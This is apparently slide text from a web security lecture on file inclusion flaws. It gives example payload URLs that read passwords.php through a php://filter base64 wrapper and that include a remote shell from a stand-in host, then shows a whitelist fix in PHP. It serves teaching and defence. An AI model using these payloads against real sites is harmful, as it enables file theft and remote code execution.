Web Vuln 02
Web Vuln 02
http://shmt.anapnea.net/lfitest/index.php?page=about.php
• In the worst case scenario, any file from the website or even
server can be read (depends on the OS and webserver
config).
http://shmt.anapnea.net/lfitest/index.php?page=php://filter/
convert.base64-encode/resource=passwords.php
http://shmt.anapnea.net/lfitest/index.php?
page=http://evilsite.com/shell.txt
• Usually
used to include shells – programs
made to make further attacking easier
Protecting from LFI
• Don't receive the parameters dinamically.
• If it's impossible, hard-code the possible
values:
<?php $file=$_GET['page'];
$check = array('index.php', 'new.php', 'guestbook.php');
if(in_array($file, $check)) {
include($file);} else {include('index.php');} ?>
Any questions?